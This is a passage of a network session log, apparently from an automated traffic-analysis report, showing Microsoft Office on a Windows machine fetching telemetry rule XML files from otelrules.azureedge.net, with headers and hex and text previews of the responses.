                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                          ETag: "0x8DC582BE39DFC9B"
                                                                                                                          x-ms-request-id: defb5908-e01e-0033-2de2-1a4695000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cfvzwz27u5rnq9kpc00000005c000000000bstn
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          99192.168.2.44986213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 2284
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                          ETag: "0x8DC582BCD58BEEE"
                                                                                                                          x-ms-request-id: 0cb7a61f-501e-0064-6562-1c1f54000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cf9wwz8ehu7c5p33g00000002g0000000001y2u
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          100192.168.2.44986413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1356
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                          ETag: "0x8DC582BDC681E17"
                                                                                                                          x-ms-request-id: 91985fd7-d01e-008e-1e12-1c387a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cfvq8pt2ak3arkg6n0000000360000000003rn6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          101192.168.2.44986613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:47 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:47 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:47 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1356
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                          ETag: "0x8DC582BDF66E42D"
                                                                                                                          x-ms-request-id: 3704a696-901e-0048-3641-1cb800000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162147Z-17db6f7c8cfvq8pt2ak3arkg6n0000000340000000008239
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:47 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          102192.168.2.44987013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:47 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:47 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:47 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1358
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                          ETag: "0x8DC582BE6431446"
                                                                                                                          x-ms-request-id: 07f85e87-a01e-003d-78df-1a98d7000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162147Z-17db6f7c8cf5mtxmr1c51513n0000000056g00000000gank
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:47 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          103192.168.2.44986713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:47 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:47 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:47 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1395
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                          ETag: "0x8DC582BE017CAD3"
                                                                                                                          x-ms-request-id: 954a8ab8-b01e-0002-131e-1c1b8f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162147Z-17db6f7c8cf8rgvlb86c9c00980000000370000000009hyf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:47 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          104192.168.2.44986813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:47 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:47 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:47 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1395
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                          ETag: "0x8DC582BDE12A98D"
                                                                                                                          x-ms-request-id: 76e86a3b-101e-0046-5a47-1c91b0000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162147Z-17db6f7c8cfspvtq2pgqb2w5k000000005400000000002z9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:47 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          105192.168.2.44986913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:47 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:47 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:47 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1358
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                          ETag: "0x8DC582BE022ECC5"
                                                                                                                          x-ms-request-id: e6504dd7-401e-0015-6cce-1a0e8d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162147Z-17db6f7c8cfnqpbkckdefmqa440000000550000000007n2z
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:47 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          106192.168.2.44987113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:48 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:48 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:48 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1389
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                          ETag: "0x8DC582BE10A6BC1"
                                                                                                                          x-ms-request-id: d1e3fcb8-a01e-001e-0795-1b49ef000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162148Z-17db6f7c8cfq2j6f03aq9y8dns00000004e0000000000pbk
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:48 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          107192.168.2.44987313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:48 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:48 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:48 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1405
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                          ETag: "0x8DC582BE12B5C71"
                                                                                                                          x-ms-request-id: b764448c-501e-008c-4097-1bcd39000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162148Z-17db6f7c8cfp6mfve0htepzbps00000004e000000000fa3m
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:48 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          108192.168.2.44987213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:48 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
